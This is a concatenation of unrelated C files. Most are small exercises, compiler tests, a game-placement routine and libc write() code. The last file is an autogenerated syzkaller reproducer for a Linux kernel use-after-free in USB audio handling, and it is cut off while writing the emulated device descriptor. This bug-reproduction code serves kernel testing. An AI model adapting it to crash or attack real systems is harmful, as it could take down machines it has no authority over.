ini_end(puzzle[15], &ini_r, &ini_c, &end_r, &end_c, color);
if(strcmp(Board[9][9], color2) == 0){
place(4,4,&ini_r,&end_r,&ini_c,&end_c,Board,puzzle[15]);
}
else if(strcmp(Board[4][4], color2) == 0){
rotate(puzzle[15]);
rotate(puzzle[15]);
ini_end(puzzle[15], &ini_r, &ini_c, &end_r, &end_c, color);
place(7,7,&ini_r,&end_r,&ini_c,&end_c,Board,puzzle[15]);
}
else{
place(4,4,&ini_r,&end_r,&ini_c,&end_c,Board,puzzle[15]);
}
pattern[15] = 0;
}
else{
bool create;
bool elmin;
bool oppo;
bool isoppo = false;
int oppoarcnum;
int createnum;
int elmnum;
int oppedgenum;
int dest;
int totalarea;
int totalcreatearea;
int totalelmarea;
int totaloppoarea;
int opparc_r[8] = {0};
int opparc_c[8] = {0};
int elmarc_r[8] = {0};
int elmarc_c[8] = {0};
int createarc_r[8] = {0};
int createarc_c[8] = {0};
int mostoppedge = 0;
int mosttotalarea = -10000;
int mostselfarea1 = 0;
int moseselfarea2 = 0;
int placepattern, placeflip, placerotate, place_r, place_c, placeini_r, placeini_c, placeend_r, placeend_c;
int opparea;
int createarea;
int elmarea;
int selfarea1;
int selfarea2;
notpass = false;
n = 0;
findarc(Board, k, t, &n, color);
for(m = 0; m < 21; m++){
if(pattern[m] == 1){
for(i = 0; i < n; i++){
for(j = 0; j < 2; j++){
for(l = 0; l < 4; l++){
ini_end(puzzle[m], &ini_r, &ini_c, &end_r, &end_c, color);
int q = end_r - ini_r + 1;
int w = end_c - ini_c + 1;
for(h = -(q - 1); h < q; h++){
for(e = -(w - 1) ; e < w; e++){
place_able = false;
if((k[i] + h < 0) || (t[i] + e < 0) || (k[i] + h > 13) || (t[i] + e > 13)) {
}
else{
place_able = placeable(puzzle[m], Board, k[i] + h, t[i] + e, &ini_r, &end_r, &ini_c, &end_c, color);
notpass = notpass | place_able;
if(place_able){
oppoarcnum = 0;
createnum = 0;
elmnum = 0;
oppedgenum = 0;
dest = 0;
create = false;
elmin = false;
oppo = false;
totalcreatearea = 0;
totalelmarea = 0;
totaloppoarea = 0;
opparea = 0;
createarea = 0;
elmarea = 0;
totalarea = 0;
selfarea1 = 0;
selfarea2 = 0;
arcinfo(puzzle[m], Board, k[i] + h, t[i] + e, ini_r, end_r, ini_c, end_c, opparc_r, opparc_c, elmarc_r, elmarc_c,
createarc_r, createarc_c, &oppoarcnum, &elmnum, &createnum, &oppedgenum, &dest, &create, &elmin , &oppo, color, color2);
//printf("\ncrearenum = %d, elmnum = %d, opnum = %d\n", createnum, elmnum, oppoarcnum);
selfarea_1(&puzzle[m], &selfarea1, ini_r, ini_c, end_r, end_c, color);
selfarea_2(&selfarea2, ini_r, ini_c, end_r, end_c);
if(create){
for(s = 0; s < createnum; s++){
arcarea2(Board, dest, createarc_r[s], createarc_c[s], &createarea, color, color2);
//printf("carc_r = %d, carc_c = %d, carea = %d\n", createarc_r[s], createarc_c[s], createarea);
totalcreatearea = createarea + totalcreatearea;
}
}
if(elmin){
for(s = 0; s < elmnum; s++){
arcarea(Board, elmarc_r[s], elmarc_c[s], &elmarea, color, color2);
//printf("earc_r = %d, earc_c = %d, earea = %d\n", elmarc_r[s], elmarc_c[s], elmarea);
totalelmarea = totalelmarea + elmarea;
}
}
if(oppo){
isoppo = true;
for(s = 0; s < oppoarcnum; s++){
arcarea(Board, opparc_r[s], opparc_c[s], &opparea, color2, color);
//printf("oarc_r = %d, oarc_c = %d, oarea = %d\n", opparc_r[s], opparc_c[s], opparea);
totaloppoarea = totaloppoarea + opparea;
}
totalarea = totaloppoarea + totalcreatearea - totalelmarea;
if(totalarea > mosttotalarea){
mosttotalarea = totalarea;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
else{
if(selfarea2 > moseselfarea2){
moseselfarea2 = selfarea2;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
else{
if(selfarea1 > mostselfarea1){
mostselfarea1 = selfarea1;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
else{
if(oppedgenum > mostoppedge){
mostoppedge = oppedgenum;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
}
}
}
}
else if(!isoppo){
totalarea = createarea - elmarea;
if(selfarea1 > mostselfarea1){
mostselfarea1 = selfarea1;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
else{
if(selfarea2 > moseselfarea2){
moseselfarea2 = selfarea2;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
else{
if(oppedgenum > mostoppedge){
mostoppedge = oppedgenum;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
else{
if(totalarea > mosttotalarea){
mosttotalarea = totalarea;
place_r = k[i] + h;
place_c = t[i] + e;
placeini_r = ini_r;
placeini_c = ini_c;
placeend_r = end_r;
placeend_c = end_c;
placepattern = m;
placeflip = j;
placerotate = l;
}
}
}
}
}
}
}
}
}
rotate(puzzle[m]);
}
flip(puzzle[m]);
}
}
}
}
if(!notpass){
return 1;
}
else{
for(i = 0; i < placeflip; i++){
flip(puzzle[placepattern]);
}
for(j = 0; j < placerotate; j++){
rotate(puzzle[placepattern]);
}
place(place_r, place_c, &placeini_r, &placeend_r, &placeini_c, &placeend_c, Board, puzzle[placepattern]);
pattern[placepattern] = 0;
}
}
FILE *out = fopen(argv[2], "w");
for(i = 0; i < 14; i++){
for(j = 0; j < 14; j++){
if(j == 13){
fprintf(out, "%s\n", Board[i][j]);
}
else{
fprintf(out, "%s,", Board[i][j]);
}
}
}
FILE *out2 = fopen(argv[3], "a");
char outpat[20];
for(i = 0; i < 21; i++){
sprintf(outpat, "%d", pattern[i]);
if(i == 0){
fprintf(out2, "\n[%s,", outpat);
}
else if(i == 20){
fprintf(out2, "%s]", outpat);
}
else{
fprintf(out2, "%s,", outpat);
}
}
fclose(out);
fclose(out2);
return 0;
}
|
the_stack_data/115766851.c | /* Author: pbollom
Date: 2020-05-31
Description: 4-14 a macro to swap two arguments of type t */
#include<stdio.h>
#define swap(t, x, y) {t temp = x; x = y; y = temp;}
int main()
{
int x, y;
x = 2;
y = -2;
swap(int, x, y);
printf("x=%d y=%d\n", x, y);
char x2, y2;
x2 = 'p';
y2 = 'B';
swap(char, x2, y2);
printf("x=%c y=%c\n", x2, y2);
return 0;
} |
the_stack_data/145453327.c |
#include "stdio.h"
int main()
{
printf("hello world\n");
return 1;
}
|
the_stack_data/92325268.c | /*
Copyright (c) 2014-2015, Alexey Frunze
2-clause BSD license.
*/
#include <unistd.h>
#ifdef _DOS
#ifdef __HUGE__
static
int DosWrite(int handle, void* buf, unsigned size, unsigned* sizeOrError)
{
asm("mov ah, 0x40\n"
"mov bx, [bp + 8]\n"
"mov edx, [bp + 12]\n"
"ror edx, 4\n"
"mov ds, dx\n"
"shr edx, 28\n"
"mov cx, [bp + 16]\n"
"int 0x21");
asm("movzx ebx, ax\n"
"cmc\n"
"sbb ax, ax\n"
"and eax, 1\n"
"mov esi, [bp + 20]\n"
"ror esi, 4\n"
"mov ds, si\n"
"shr esi, 28\n"
"mov [si], ebx");
}
#endif // __HUGE__
#ifdef __SMALLER_C_16__
static
int DosWrite(int handle, void* buf, unsigned size, unsigned* sizeOrError)
{
asm("mov ah, 0x40\n"
"mov bx, [bp + 4]\n"
"mov dx, [bp + 6]\n"
"mov cx, [bp + 8]\n"
"int 0x21");
asm("mov bx, ax\n"
"cmc\n"
"sbb ax, ax\n"
"and ax, 1\n"
"mov si, [bp + 10]\n"
"mov [si], bx");
}
#endif // __SMALLER_C_16__
#ifdef _DPMI
#include <string.h>
#include "idpmi.h"
static
int DosWrite(int handle, void* buf, unsigned size, unsigned* sizeOrError)
{
__dpmi_int_regs regs;
memcpy(__dpmi_iobuf, buf, size);
memset(®s, 0, sizeof regs);
regs.eax = 0x4000;
regs.ebx = handle;
regs.ecx = size;
regs.edx = (unsigned)__dpmi_iobuf & 0xF;
regs.ds = (unsigned)__dpmi_iobuf >> 4;
if (__dpmi_int(0x21, ®s))
{
*sizeOrError = -1;
return 0;
}
*sizeOrError = regs.eax & 0xFFFF;
return (regs.flags & 1) ^ 1; // carry
}
#endif // _DPMI
ssize_t write(int fd, void* buf, size_t size)
{
ssize_t cnt = 0;
char* p = buf;
if ((ssize_t)size < 0)
{
return -1;
}
while (size)
{
#ifdef __HUGE__
// DOS can read/write at most 65535 bytes at a time.
// An arbitrary 20-bit physical address can be transformed
// into a segment:offset pair such that offset is always <= 15
// (which is what we do under the hood in the huge mode(l))
// and therefore the size is additionally limited by this
// offset that can be as high as 15 and DOS will only have
// the range from this offset (at most 15(0xF)) to 65535(0xFFFF)
// within a segment. So, cap the size at 0xFFF0.
unsigned sz = (size > 0xFFF0) ? 0xFFF0 : size;
#endif
#ifdef _DPMI
// Similarly to huge, the DPMI I/O buffer size is also smaller than 64KB.
unsigned sz = (size > __DPMI_IOFBUFSZ) ? __DPMI_IOFBUFSZ : size;
#endif
#ifndef __HUGE__
#ifndef _DPMI
unsigned sz = size;
#endif
#endif
unsigned writtenOrError;
if (DosWrite(fd, p, sz, &writtenOrError))
{
p += writtenOrError;
cnt += writtenOrError;
size -= writtenOrError;
if (writtenOrError < sz)
return cnt;
}
else
{
return -1;
}
}
return cnt;
}
#endif // _DOS
#ifdef _WINDOWS
#include "iwin32.h"
ssize_t write(int fd, void* buf, size_t size)
{
unsigned writtenOrError;
if ((ssize_t)size < 0)
{
return -1;
}
if (!size)
return 0;
// TBD??? Fix this hack???
// GetStdHandle(STD_INPUT_HANDLE), GetStdHandle(STD_OUTPUT_HANDLE) and GetStdHandle(STD_ERROR_HANDLE)
// appear to always return 3, 7 and 11 when there's no redirection. Other handles (e.g. those of files)
// appear to have values that are multiples of 4. I'm not sure if GetStdHandle() can ever return values
// 0, 1 and 2 or if any other valid handle can ever be equal to 0, 1 or 2.
// If 0, 1 and 2 can be valid handles in the system, I'll need to renumber/translate handles in the C library.
if (fd >= STDIN_FILENO && fd <= STDERR_FILENO)
fd = GetStdHandle(STD_INPUT_HANDLE - fd);
if (WriteFile(fd, buf, size, &writtenOrError, 0))
{
return writtenOrError;
}
else
{
return -1;
}
}
#endif // _WINDOWS
#ifdef _LINUX
ssize_t write(int fd, void* buf, size_t size)
{
asm("mov eax, 4\n" // sys_write
"mov ebx, [ebp + 8]\n"
"mov ecx, [ebp + 12]\n"
"mov edx, [ebp + 16]\n"
"int 0x80");
}
#endif // _LINUX
#ifdef _MACOS
ssize_t write(int fd, void* buf, size_t size)
{
asm("mov eax, 4\n" // sys_write
"push dword [ebp + 16]\n"
"push dword [ebp + 12]\n"
"push dword [ebp + 8]\n"
"sub esp, 4\n"
"int 0x80");
}
#endif // _MACOS
|
the_stack_data/190768656.c | #include <assert.h>
extern int printf(const char*, ...);
char arr[1];
static void f (void){}
void (*fp)(void) = f;
void call_fp()
{
(fp?f:f)();
(fp?fp:fp)();
(fp?fp:&f)();
(fp?&f:fp)();
(fp?&f:&f)();
_Generic(0?arr:arr, char*: (void)0);
_Generic(0?&arr[0]:arr, char*: (void)0);
_Generic(0?arr:&arr[0], char*: (void)0);
_Generic(1?arr:arr, char*: (void)0);
_Generic(1?&arr[0]:arr, char*: (void)0);
_Generic(1?arr:&arr[0], char*: (void)0);
_Generic((__typeof(1?f:f)*){0}, void (**)(void): (void)0);
(fp?&f:f)();
(fp?f:&f)();
_Generic((__typeof(fp?0L:(void)0)*){0}, void*: (void)0);
/* The following line causes a warning */
void *xx = fp?f:1;
}
struct condstruct {
int i;
};
static int getme(struct condstruct* s, int i)
{
int i1 = (i != 0 ? 0 : s)->i;
int i2 = (i == 0 ? s : 0)->i;
int i3 = (i != 0 ? (void*)0 : s)->i;
int i4 = (i == 0 ? s : (void*)0)->i;
return i1 + i2 + i3 + i4;
}
int main()
{
int Count;
for (Count = 0; Count < 10; Count++)
{
printf("%d\n", (Count < 5) ? (Count*Count) : (Count * 3));
}
{
int c = 0;
#define ASSERT(X) assert(X)
static struct stru { int x; } a={'A'},b={'B'};
static const struct stru2 { int x; } d = { 'D' };
ASSERT('A'==(*(1?&a:&b)).x);
ASSERT('A'==(1?a:b).x);
ASSERT('A'==(c?b:a).x);
ASSERT('A'==(0?b:a).x);
c=1;
ASSERT('A'==(c?a:b).x);
ASSERT(sizeof(int) == sizeof(0 ? 'a' : c));
ASSERT(sizeof(double) == sizeof(0 ? 'a' : 1.0));
ASSERT(sizeof(double) == sizeof(0 ? 0.0 : 'a'));
ASSERT(sizeof(float) == sizeof(0 ? 'a' : 1.0f));
ASSERT(sizeof(double) == sizeof(0 ? 0.0 : 1.0f));
struct condstruct cs = { 38 };
printf("%d\n", getme(&cs, 0));
// the following lines contain type mismatch errors in every ternary expression
//printf("comparing double with pointer : size = %d\n", sizeof(0 ? &c : 0.0));
//printf("'%c' <> '%c'\n", (0 ? a : d).x, (1 ? a : d).x);
//0 ? a : 0.0;
}
return 0;
}
/* vim: set expandtab ts=4 sw=3 sts=3 tw=80 :*/
|
the_stack_data/126182.c | #include <stdio.h>
int main(void) {
int a, b, c;
printf("Enter a two-digit number: ");
scanf("%1d%1d%1d", &a, &b, &c);
printf("%d%d%d", c, b, a);
return 0;
}
// Enter a two-digit number: 809 |
the_stack_data/148578555.c | #include <stdio.h>
#include <inttypes.h>
// Runtime entry point.
// The compiler generated code is linked here.
/* all scheme values are of type ptrs */
typedef uint64_t ptr;
extern ptr scheme_entry (void);
/* define all scheme constants */
#define boolf 0x2f
#define boolt 0x6f
#define null 0x3f
#define ch_mask 0xff
#define ch_tag 0x0f
#define ch_shift 8
#define fx_mask 0x03
#define fx_tag 0x00
#define fx_shift 2
static void
print_ptr(ptr x)
{
if ((x & fx_mask) == fx_tag)
printf ("%" PRIi64, (int64_t) ((uint64_t) x) >> fx_shift);
else if ((x & ch_mask) == ch_tag)
printf ("#\\%c", (char) ((uint64_t) x) >> ch_shift);
else if (x == boolf)
printf ("#f");
else if (x == boolt)
printf ("#t");
else if (x == null)
printf ("()");
else
printf ("#<unknown 0x%08lx>", x);
printf ("\n");
}
int
main(void)
{
print_ptr (scheme_entry ());
return 0;
}
|
the_stack_data/667805.c | // KASAN: use-after-free Read in build_audio_procunit
// https://syzkaller.appspot.com/bug?id=8e24ec21f20d389ae8aee806692723845a23b9a1
// status:dup
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <linux/usb/ch9.h>
unsigned long long procid;
static void sleep_ms(uint64_t ms)
{
usleep(ms * 1000);
}
static uint64_t current_time_ms(void)
{
struct timespec ts;
if (clock_gettime(CLOCK_MONOTONIC, &ts))
exit(1);
return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}
static bool write_file(const char* file, const char* what, ...)
{
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}
#define MAX_FDS 30
#define USB_DEBUG 0
#define USB_MAX_IFACE_NUM 4
#define USB_MAX_EP_NUM 32
struct usb_iface_index {
struct usb_interface_descriptor* iface;
uint8_t bInterfaceNumber;
uint8_t bAlternateSetting;
struct usb_endpoint_descriptor eps[USB_MAX_EP_NUM];
int eps_num;
};
struct usb_device_index {
struct usb_device_descriptor* dev;
struct usb_config_descriptor* config;
uint8_t bMaxPower;
int config_length;
struct usb_iface_index ifaces[USB_MAX_IFACE_NUM];
int ifaces_num;
int iface_cur;
};
static bool parse_usb_descriptor(char* buffer, size_t length,
struct usb_device_index* index)
{
if (length < sizeof(*index->dev) + sizeof(*index->config))
return false;
memset(index, 0, sizeof(*index));
index->dev = (struct usb_device_descriptor*)buffer;
index->config = (struct usb_config_descriptor*)(buffer + sizeof(*index->dev));
index->bMaxPower = index->config->bMaxPower;
index->config_length = length - sizeof(*index->dev);
index->iface_cur = -1;
size_t offset = 0;
while (true) {
if (offset + 1 >= length)
break;
uint8_t desc_length = buffer[offset];
uint8_t desc_type = buffer[offset + 1];
if (desc_length <= 2)
break;
if (offset + desc_length > length)
break;
if (desc_type == USB_DT_INTERFACE &&
index->ifaces_num < USB_MAX_IFACE_NUM) {
struct usb_interface_descriptor* iface =
(struct usb_interface_descriptor*)(buffer + offset);
index->ifaces[index->ifaces_num].iface = iface;
index->ifaces[index->ifaces_num].bInterfaceNumber =
iface->bInterfaceNumber;
index->ifaces[index->ifaces_num].bAlternateSetting =
iface->bAlternateSetting;
index->ifaces_num++;
}
if (desc_type == USB_DT_ENDPOINT && index->ifaces_num > 0) {
struct usb_iface_index* iface = &index->ifaces[index->ifaces_num - 1];
if (iface->eps_num < USB_MAX_EP_NUM) {
memcpy(&iface->eps[iface->eps_num], buffer + offset,
sizeof(iface->eps[iface->eps_num]));
iface->eps_num++;
}
}
offset += desc_length;
}
return true;
}
enum usb_fuzzer_event_type {
USB_FUZZER_EVENT_INVALID,
USB_FUZZER_EVENT_CONNECT,
USB_FUZZER_EVENT_DISCONNECT,
USB_FUZZER_EVENT_SUSPEND,
USB_FUZZER_EVENT_RESUME,
USB_FUZZER_EVENT_CONTROL,
};
struct usb_fuzzer_event {
uint32_t type;
uint32_t length;
char data[0];
};
struct usb_fuzzer_init {
uint64_t speed;
const char* driver_name;
const char* device_name;
};
struct usb_fuzzer_ep_io {
uint16_t ep;
uint16_t flags;
uint32_t length;
char data[0];
};
#define USB_FUZZER_IOCTL_INIT _IOW('U', 0, struct usb_fuzzer_init)
#define USB_FUZZER_IOCTL_RUN _IO('U', 1)
#define USB_FUZZER_IOCTL_EVENT_FETCH _IOR('U', 2, struct usb_fuzzer_event)
#define USB_FUZZER_IOCTL_EP0_WRITE _IOW('U', 3, struct usb_fuzzer_ep_io)
#define USB_FUZZER_IOCTL_EP0_READ _IOWR('U', 4, struct usb_fuzzer_ep_io)
#define USB_FUZZER_IOCTL_EP_ENABLE _IOW('U', 5, struct usb_endpoint_descriptor)
#define USB_FUZZER_IOCTL_EP_DISABLE _IOW('U', 6, int)
#define USB_FUZZER_IOCTL_EP_WRITE _IOW('U', 7, struct usb_fuzzer_ep_io)
#define USB_FUZZER_IOCTL_EP_READ _IOWR('U', 8, struct usb_fuzzer_ep_io)
#define USB_FUZZER_IOCTL_CONFIGURE _IO('U', 9)
#define USB_FUZZER_IOCTL_VBUS_DRAW _IOW('U', 10, uint32_t)
static int usb_fuzzer_open()
{
return open("/sys/kernel/debug/usb-fuzzer", O_RDWR);
}
static int usb_fuzzer_init(int fd, uint32_t speed, const char* driver,
const char* device)
{
struct usb_fuzzer_init arg;
arg.speed = speed;
arg.driver_name = driver;
arg.device_name = device;
return ioctl(fd, USB_FUZZER_IOCTL_INIT, &arg);
}
static int usb_fuzzer_run(int fd)
{
return ioctl(fd, USB_FUZZER_IOCTL_RUN, 0);
}
static int usb_fuzzer_event_fetch(int fd, struct usb_fuzzer_event* event)
{
return ioctl(fd, USB_FUZZER_IOCTL_EVENT_FETCH, event);
}
static int usb_fuzzer_ep0_write(int fd, struct usb_fuzzer_ep_io* io)
{
return ioctl(fd, USB_FUZZER_IOCTL_EP0_WRITE, io);
}
static int usb_fuzzer_ep0_read(int fd, struct usb_fuzzer_ep_io* io)
{
return ioctl(fd, USB_FUZZER_IOCTL_EP0_READ, io);
}
static int usb_fuzzer_ep_enable(int fd, struct usb_endpoint_descriptor* desc)
{
return ioctl(fd, USB_FUZZER_IOCTL_EP_ENABLE, desc);
}
static int usb_fuzzer_ep_disable(int fd, int ep)
{
return ioctl(fd, USB_FUZZER_IOCTL_EP_DISABLE, ep);
}
static int usb_fuzzer_configure(int fd)
{
return ioctl(fd, USB_FUZZER_IOCTL_CONFIGURE, 0);
}
static int usb_fuzzer_vbus_draw(int fd, uint32_t power)
{
return ioctl(fd, USB_FUZZER_IOCTL_VBUS_DRAW, power);
}
#define MAX_USB_FDS 6
struct usb_info {
int fd;
struct usb_device_index index;
};
static struct usb_info usb_devices[MAX_USB_FDS];
static int usb_devices_num;
static struct usb_device_index* add_usb_index(int fd, char* dev, size_t dev_len)
{
int i = __atomic_fetch_add(&usb_devices_num, 1, __ATOMIC_RELAXED);
if (i >= MAX_USB_FDS)
return NULL;
int rv = 0;
rv = parse_usb_descriptor(dev, dev_len, &usb_devices[i].index);
if (!rv)
return NULL;
__atomic_store_n(&usb_devices[i].fd, fd, __ATOMIC_RELEASE);
return &usb_devices[i].index;
}
static struct usb_device_index* lookup_usb_index(int fd)
{
int i;
for (i = 0; i < MAX_USB_FDS; i++) {
if (__atomic_load_n(&usb_devices[i].fd, __ATOMIC_ACQUIRE) == fd) {
return &usb_devices[i].index;
}
}
return NULL;
}
static void set_interface(int fd, int n)
{
struct usb_device_index* index = lookup_usb_index(fd);
int ep;
if (!index)
return;
if (index->iface_cur >= 0 && index->iface_cur < index->ifaces_num) {
for (ep = 0; ep < index->ifaces[index->iface_cur].eps_num; ep++) {
int rv = usb_fuzzer_ep_disable(fd, ep);
if (rv < 0) {
} else {
}
}
}
if (n >= 0 && n < index->ifaces_num) {
for (ep = 0; ep < index->ifaces[n].eps_num; ep++) {
int rv = usb_fuzzer_ep_enable(fd, &index->ifaces[n].eps[ep]);
if (rv < 0) {
} else {
}
}
index->iface_cur = n;
}
}
static int configure_device(int fd)
{
struct usb_device_index* index = lookup_usb_index(fd);
if (!index)
return -1;
int rv = usb_fuzzer_vbus_draw(fd, index->bMaxPower);
if (rv < 0) {
return rv;
}
rv = usb_fuzzer_configure(fd);
if (rv < 0) {
return rv;
}
set_interface(fd, 0);
return 0;
}
#define USB_MAX_PACKET_SIZE 1024
struct usb_fuzzer_control_event {
struct usb_fuzzer_event inner;
struct usb_ctrlrequest ctrl;
char data[USB_MAX_PACKET_SIZE];
};
struct usb_fuzzer_ep_io_data {
struct usb_fuzzer_ep_io inner;
char data[USB_MAX_PACKET_SIZE];
};
struct vusb_connect_string_descriptor {
uint32_t len;
char* str;
} __attribute__((packed));
struct vusb_connect_descriptors {
uint32_t qual_len;
char* qual;
uint32_t bos_len;
char* bos;
uint32_t strs_len;
struct vusb_connect_string_descriptor strs[0];
} __attribute__((packed));
static const char default_string[] = {8, USB_DT_STRING, 's', 0, 'y', 0, 'z', 0};
static const char default_lang_id[] = {4, USB_DT_STRING, 0x09, 0x04};
static bool lookup_connect_response(int fd,
struct vusb_connect_descriptors* descs,
struct usb_ctrlrequest* ctrl,
char** response_data,
uint32_t* response_length)
{
struct usb_device_index* index = lookup_usb_index(fd);
uint8_t str_idx;
if (!index)
return false;
switch (ctrl->bRequestType & USB_TYPE_MASK) {
case USB_TYPE_STANDARD:
switch (ctrl->bRequest) {
case USB_REQ_GET_DESCRIPTOR:
switch (ctrl->wValue >> 8) {
case USB_DT_DEVICE:
*response_data = (char*)index->dev;
*response_length = sizeof(*index->dev);
return true;
case USB_DT_CONFIG:
*response_data = (char*)index->config;
*response_length = index->config_length;
return true;
case USB_DT_STRING:
str_idx = (uint8_t)ctrl->wValue;
if (descs && str_idx < descs->strs_len) {
*response_data = descs->strs[str_idx].str;
*response_length = descs->strs[str_idx].len;
return true;
}
if (str_idx == 0) {
*response_data = (char*)&default_lang_id[0];
*response_length = default_lang_id[0];
return true;
}
*response_data = (char*)&default_string[0];
*response_length = default_string[0];
return true;
case USB_DT_BOS:
*response_data = descs->bos;
*response_length = descs->bos_len;
return true;
case USB_DT_DEVICE_QUALIFIER:
if (!descs->qual) {
struct usb_qualifier_descriptor* qual =
(struct usb_qualifier_descriptor*)response_data;
qual->bLength = sizeof(*qual);
qual->bDescriptorType = USB_DT_DEVICE_QUALIFIER;
qual->bcdUSB = index->dev->bcdUSB;
qual->bDeviceClass = index->dev->bDeviceClass;
qual->bDeviceSubClass = index->dev->bDeviceSubClass;
qual->bDeviceProtocol = index->dev->bDeviceProtocol;
qual->bMaxPacketSize0 = index->dev->bMaxPacketSize0;
qual->bNumConfigurations = index->dev->bNumConfigurations;
qual->bRESERVED = 0;
*response_length = sizeof(*qual);
return true;
}
*response_data = descs->qual;
*response_length = descs->qual_len;
return true;
default:
exit(1);
return false;
}
break;
default:
exit(1);
return false;
}
break;
default:
exit(1);
return false;
}
return false;
}
static volatile long syz_usb_connect(volatile long a0, volatile long a1,
volatile long a2, volatile long a3)
{
uint64_t speed = a0;
uint64_t dev_len = a1;
char* dev = (char*)a2;
struct vusb_connect_descriptors* descs = (struct vusb_connect_descriptors*)a3;
if (!dev) {
return -1;
}
int fd = usb_fuzzer_open();
if (fd < 0) {
return fd;
}
if (fd >= MAX_FDS) {
close(fd);
return -1;
}
struct usb_device_index* index = add_usb_index(fd, dev, dev_len);
if (!index) {
return -1;
}
char device[32];
sprintf(&device[0], "dummy_udc.%llu", procid);
int rv = usb_fuzzer_init(fd, speed, "dummy_udc", &device[0]);
if (rv < 0) {
return rv;
}
rv = usb_fuzzer_run(fd);
if (rv < 0) {
return rv;
}
bool done = false;
while (!done) {
struct usb_fuzzer_control_event event;
event.inner.type = 0;
event.inner.length = sizeof(event.ctrl);
rv = usb_fuzzer_event_fetch(fd, (struct usb_fuzzer_event*)&event);
if (rv < 0) {
return rv;
}
if (event.inner.type != USB_FUZZER_EVENT_CONTROL)
continue;
bool response_found = false;
char* response_data = NULL;
uint32_t response_length = 0;
if (event.ctrl.bRequestType & USB_DIR_IN) {
response_found = lookup_connect_response(
fd, descs, &event.ctrl, &response_data, &response_length);
if (!response_found) {
return -1;
}
} else {
if ((event.ctrl.bRequestType & USB_TYPE_MASK) != USB_TYPE_STANDARD ||
event.ctrl.bRequest != USB_REQ_SET_CONFIGURATION) {
exit(1);
return -1;
}
done = true;
}
if (done) {
rv = configure_device(fd);
if (rv < 0) {
return rv;
}
}
struct usb_fuzzer_ep_io_data response;
response.inner.ep = 0;
response.inner.flags = 0;
if (response_length > sizeof(response.data))
response_length = 0;
if (event.ctrl.wLength < response_length)
response_length = event.ctrl.wLength;
response.inner.length = response_length;
if (response_data)
memcpy(&response.data[0], response_data, response_length);
else
memset(&response.data[0], 0, response_length);
if (event.ctrl.bRequestType & USB_DIR_IN) {
rv = usb_fuzzer_ep0_write(fd, (struct usb_fuzzer_ep_io*)&response);
} else {
rv = usb_fuzzer_ep0_read(fd, (struct usb_fuzzer_ep_io*)&response);
}
if (rv < 0) {
return rv;
}
}
sleep_ms(200);
return fd;
}
static void kill_and_wait(int pid, int* status)
{
kill(-pid, SIGKILL);
kill(pid, SIGKILL);
int i;
for (i = 0; i < 100; i++) {
if (waitpid(-1, status, WNOHANG | __WALL) == pid)
return;
usleep(1000);
}
DIR* dir = opendir("/sys/fs/fuse/connections");
if (dir) {
for (;;) {
struct dirent* ent = readdir(dir);
if (!ent)
break;
if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
continue;
char abort[300];
snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort",
ent->d_name);
int fd = open(abort, O_WRONLY);
if (fd == -1) {
continue;
}
if (write(fd, abort, 1) < 0) {
}
close(fd);
}
closedir(dir);
} else {
}
while (waitpid(-1, status, __WALL) != pid) {
}
}
static void setup_test()
{
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setpgrp();
write_file("/proc/self/oom_score_adj", "1000");
}
static void execute_one(void);
#define WAIT_FLAGS __WALL
static void loop(void)
{
int iter;
for (iter = 0;; iter++) {
int pid = fork();
if (pid < 0)
exit(1);
if (pid == 0) {
setup_test();
execute_one();
exit(0);
}
int status = 0;
uint64_t start = current_time_ms();
for (;;) {
if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
break;
sleep_ms(1);
if (current_time_ms() - start < 5 * 1000)
continue;
kill_and_wait(pid, &status);
break;
}
}
}
void execute_one(void)
{
*(uint8_t*)0x200000c0 = 0x12;
*(uint8_t*)0x200000c1 = 1;
*(uint16_t*)0x200000c2 = 0;
*(uint8_t*)0x200000c4 = 0;
*(uint8_t*)0x200000c5 = 0;
*(uint8_t*)0x200000c6 = 0;
*(uint8_t*)0x200000c7 = 0x20;
*(uint16_t*)0x200000c8 = 0x1d6b;
*(uint16_t*)0x200000ca = 0x101;
*(uint16_t*)0x200000cc = 0x40;
*(uint8_t*)0x200000ce = 1;
*(uint8_t*)0x200000cf = 2;
